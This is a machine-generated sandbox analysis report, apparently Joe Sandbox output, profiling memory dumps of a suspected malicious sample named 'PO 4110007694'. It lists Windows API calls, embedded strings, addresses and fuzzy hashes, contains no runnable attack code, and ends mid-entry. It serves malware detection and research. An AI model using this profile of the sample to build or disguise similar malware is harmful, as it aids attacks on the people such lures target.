                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                    • String ID: @$ThumbnailClass
                                                                    • API String ID: 1788623398-1539354611
                                                                    • Opcode ID: 093a49f1e1363f3b080d6f54fc995e049de3800f38a4b27b97b2bfef3ad7a424
                                                                    • Instruction ID: c1674919f1cba2d620fa25357ba2bbf23d3284164b2e374cdd38d66e745e31c2
                                                                    • Opcode Fuzzy Hash: 093a49f1e1363f3b080d6f54fc995e049de3800f38a4b27b97b2bfef3ad7a424
                                                                    • Instruction Fuzzy Hash: 27819F71108305AFDB24DF50C8C5BAA7BE8EF44354F04846AFD95DA092DB30DE86CBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 1038674560-1810252412
                                                                    • Opcode ID: e6485945ce771b4f22ea4f9092bc3559d8adb98e825f8cc210312c993f75b8ee
                                                                    • Instruction ID: 58bc55ff152e7416e6f49844a0abf58ae36b8b8b15332fd2e5ded1ea0ea231dc
                                                                    • Opcode Fuzzy Hash: e6485945ce771b4f22ea4f9092bc3559d8adb98e825f8cc210312c993f75b8ee
                                                                    • Instruction Fuzzy Hash: 0E314F31948209BBDB24FA51DE83FEE77A4AB11751F600629F412710D1EF526F44BE92
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00C85013
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00C8501E
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00C85029
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00C85034
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00C8503F
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00C8504A
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00C85055
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00C85060
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00C8506B
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00C85076
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00C85081
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00C8508C
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00C85097
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00C850A2
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00C850AD
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00C850B8
                                                                    • GetCursorInfo.USER32(?), ref: 00C850C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    • Opcode ID: 0d4f1af851af7ce10f206a77b8b883df753a15724a29b89eab86581ca319132c
                                                                    • Instruction ID: f6ce81bcb912f434c8cd074d4c0d078d78432c43b7034a2031eb985423f41b07
                                                                    • Opcode Fuzzy Hash: 0d4f1af851af7ce10f206a77b8b883df753a15724a29b89eab86581ca319132c
                                                                    • Instruction Fuzzy Hash: 7C3135B0D4831D6ADF109FB68C8999FBFE8FF04754F50452AA51CE7280DB7865008F95
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C9A259
                                                                    • DestroyWindow.USER32(?,?), ref: 00C9A2D3
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C9A34D
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C9A36F
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C9A382
                                                                    • DestroyWindow.USER32(00000000), ref: 00C9A3A4
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C10000,00000000), ref: 00C9A3DB
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C9A3F4
                                                                    • GetDesktopWindow.USER32 ref: 00C9A40D
                                                                    • GetWindowRect.USER32(00000000), ref: 00C9A414
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C9A42C
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C9A444
                                                                      • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 1297703922-3619404913
                                                                    • Opcode ID: 09f3ff83dd59b1d48e61159c122b016c85ac5f09dd0813102e62c25b5db3630d
                                                                    • Instruction ID: eb54e6acd056b769a94409930188bebc423471cbcea60941e9be9bbe000c6a98
                                                                    • Opcode Fuzzy Hash: 09f3ff83dd59b1d48e61159c122b016c85ac5f09dd0813102e62c25b5db3630d
                                                                    • Instruction Fuzzy Hash: 05717B71140205AFDB21CF28CC4DFAA7BE5FB89704F04452EF995872A1D7B1EA42DB92
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00C9C627
                                                                      • Part of subcall function 00C9AB37: ClientToScreen.USER32(?,?), ref: 00C9AB60
                                                                      • Part of subcall function 00C9AB37: GetWindowRect.USER32(?,?), ref: 00C9ABD6
                                                                      • Part of subcall function 00C9AB37: PtInRect.USER32(?,?,00C9C014), ref: 00C9ABE6
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C690
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C9C69B
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C9C6BE
                                                                    • _wcscat.LIBCMT ref: 00C9C6EE
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C9C705
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C71E
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00C9C735
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00C9C757
                                                                    • DragFinish.SHELL32(?), ref: 00C9C75E
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C9C851
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 169749273-3440237614
                                                                    • Opcode ID: 24356444f67ff6720d97c22d51f2849141e3c7fc5fa7990cb1f7b08019ab27ec
                                                                    • Instruction ID: 699d5a08f81ea68494c248777850c8ae9ceccc9e3554aaa49f8ea66c7b43674f
                                                                    • Opcode Fuzzy Hash: 24356444f67ff6720d97c22d51f2849141e3c7fc5fa7990cb1f7b08019ab27ec
                                                                    • Instruction Fuzzy Hash: A0616F71108305AFCB01EF64DC89EAFBBF8EF89710F10092EF595961A1DB709A49DB52
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00C94424
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C9446F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 3974292440-4258414348
                                                                    • Opcode ID: f055d8d713340eb6cef3bb2e9d843943424fdf50e0de5a87f7acbf4051ffd902
                                                                    • Instruction ID: 160b4b51e247b86fa1a091898d2b9c330f98bde96dcc4a5d8b6c908409335d3b
                                                                    • Opcode Fuzzy Hash: f055d8d713340eb6cef3bb2e9d843943424fdf50e0de5a87f7acbf4051ffd902
                                                                    • Instruction Fuzzy Hash: FA915F712043019BCF18EF10C465AAEB7E5EF96354F15846CF8965B3A2CB31ED4AEB41
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C9B8B4
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00C96B11,?), ref: 00C9B910
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C9B949
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C9B98C
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C9B9C3
                                                                    • FreeLibrary.KERNEL32(?), ref: 00C9B9CF
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C9B9DF
                                                                    • DestroyIcon.USER32(?), ref: 00C9B9EE
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C9BA0B
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C9BA17
                                                                      • Part of subcall function 00C32EFD: __wcsicmp_l.LIBCMT ref: 00C32F86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 1212759294-1154884017
                                                                    • Opcode ID: 18c95d4399040acb69704bee265ec7308e6bfe24288880627c3fb76650385f65
                                                                    • Instruction ID: 45fa78c4a3c0d4c07f982e9c38f2af3b21532d82a5603f6231b5c050fe45f044
                                                                    • Opcode Fuzzy Hash: 18c95d4399040acb69704bee265ec7308e6bfe24288880627c3fb76650385f65
                                                                    • Instruction Fuzzy Hash: 5D61FE71910218BAEF24DF64DD49FBE77B8EB08710F10411AF925D60C0DB70AE80E7A0
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 00C7DCDC
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C7DCEC
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C7DCF8
                                                                    • __wsplitpath.LIBCMT ref: 00C7DD56
                                                                    • _wcscat.LIBCMT ref: 00C7DD6E
                                                                    • _wcscat.LIBCMT ref: 00C7DD80
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C7DD95
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DDA9
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DDDB
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DDFC
                                                                    • _wcscpy.LIBCMT ref: 00C7DE08
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C7DE47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                    • String ID: *.*
                                                                    • API String ID: 3566783562-438819550
                                                                    • Opcode ID: 18d48853ba0a2bc9dd019dec67ba898f804602acc0599a48ff38de63e22a4437
                                                                    • Instruction ID: b392629b380e3d0de2c21a45e510f8a4b5202fd7cd5a144b8b122e9e8a0a6522
                                                                    • Opcode Fuzzy Hash: 18d48853ba0a2bc9dd019dec67ba898f804602acc0599a48ff38de63e22a4437
                                                                    • Instruction Fuzzy Hash: 4B616B725042059FCB10EF60C855AAEB3F8FF89310F04892EF99AC7251DB31EA45DB92
                                                                    APIs
                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00C79C7F
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C79CA0
                                                                    • __swprintf.LIBCMT ref: 00C79CF9
                                                                    • __swprintf.LIBCMT ref: 00C79D12
                                                                    • _wprintf.LIBCMT ref: 00C79DB9
                                                                    • _wprintf.LIBCMT ref: 00C79DD7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 311963372-3080491070
                                                                    • Opcode ID: a4913bf31815c16f618717352460390cf76f04a1499cd793b43c42c5b1168186
                                                                    • Instruction ID: 8dba4f344853c715c94ed2933c9bde84feec76c2bec639d7451ab321344ba181
                                                                    • Opcode Fuzzy Hash: a4913bf31815c16f618717352460390cf76f04a1499cd793b43c42c5b1168186
                                                                    • Instruction Fuzzy Hash: BF518E31900609ABCF14EBE0DD46EEEB778EF15300F604165F519721A2EB316F99EB61
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00C7A3CB
                                                                    • GetDriveTypeW.KERNEL32 ref: 00C7A418
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A460
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A497
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A4C5
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 2698844021-4113822522
                                                                    • Opcode ID: ec1fecdf3120e71fbbbe27ea35ab90abca95e41f7c5fc7824414f1e78bad15d2
                                                                    • Instruction ID: 89550b27f5aa2250e613667c4237c175f1415bf89c88e7b303cb3b00c36ff337
                                                                    • Opcode Fuzzy Hash: ec1fecdf3120e71fbbbe27ea35ab90abca95e41f7c5fc7824414f1e78bad15d2
                                                                    • Instruction Fuzzy Hash: 91513D711082059FC700EF10C8919AFB3F4EF85758F10896DF89957251DB31EE4AEB92
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C6F8DF
                                                                    • LoadStringW.USER32(00000000,?,00C4E029,00000001), ref: 00C6F8E8
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • GetModuleHandleW.KERNEL32(00000000,00CD5310,?,00000FFF,?,?,00C4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C6F90A
                                                                    • LoadStringW.USER32(00000000,?,00C4E029,00000001), ref: 00C6F90D
                                                                    • __swprintf.LIBCMT ref: 00C6F95D
                                                                    • __swprintf.LIBCMT ref: 00C6F96E
                                                                    • _wprintf.LIBCMT ref: 00C6FA17
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C6FA2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 984253442-2268648507
                                                                    • Opcode ID: ee3ccc73bf251547c036d666dd98e8992cd0ff18386ee6069d6aaa56f1b93fa6
                                                                    • Instruction ID: 39451beeaed57cd9860eb90a4b698dac85f336d6459f15d7b629f64980b4ea4b
                                                                    • Opcode Fuzzy Hash: ee3ccc73bf251547c036d666dd98e8992cd0ff18386ee6069d6aaa56f1b93fa6
                                                                    • Instruction Fuzzy Hash: 8D413F7280410DAACF15FBE0DD96EEE7778AF55300F100569F505B6092EB316F4AEB61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                    • String ID:
                                                                    • API String ID: 884005220-0
                                                                    • Opcode ID: 50b4924530b0787ee6db5a4561df96563a7a33b103ee1842a1f682f0bfcfbfce
                                                                    • Instruction ID: a0715a37884357a0645b5c776e41b8c913c1ffff7b9c462102ea2865000dded0
                                                                    • Opcode Fuzzy Hash: 50b4924530b0787ee6db5a4561df96563a7a33b103ee1842a1f682f0bfcfbfce
                                                                    • Instruction Fuzzy Hash: A4610472981312AFEB209F24DD0176E77A4FF11361F21411AF811AB1E1EB34DA45DBA3
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00C9BA56
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00C9BA6D
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00C9BA78
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C9BA85
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00C9BA8E
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C9BA9D
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00C9BAA6
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C9BAAD
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C9BABE
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CA2CAC,?), ref: 00C9BAD7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00C9BAE7
                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00C9BB0B
                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00C9BB36
                                                                    • DeleteObject.GDI32(00000000), ref: 00C9BB5E
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C9BB74
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: 6fd1593d142e28722ea65a9c57d9e0aedb73f70dc0ac9dc96b4f005feb20bac6
                                                                    • Instruction ID: e67ed7f2c89e6b02ce4efa50c488f3368be3b0521528b6d75bc5104128c4dfa6
                                                                    • Opcode Fuzzy Hash: 6fd1593d142e28722ea65a9c57d9e0aedb73f70dc0ac9dc96b4f005feb20bac6
                                                                    • Instruction Fuzzy Hash: EF412675600209FFDB119F65ED8CFAEBBB8EB89711F104069F919D62A0C7709E02DB60
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 00C7DA10
                                                                    • _wcscat.LIBCMT ref: 00C7DA28
                                                                    • _wcscat.LIBCMT ref: 00C7DA3A
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C7DA4F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DA63
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00C7DA7B
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C7DA95
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DAA7
                                                                    Memory Dump Source
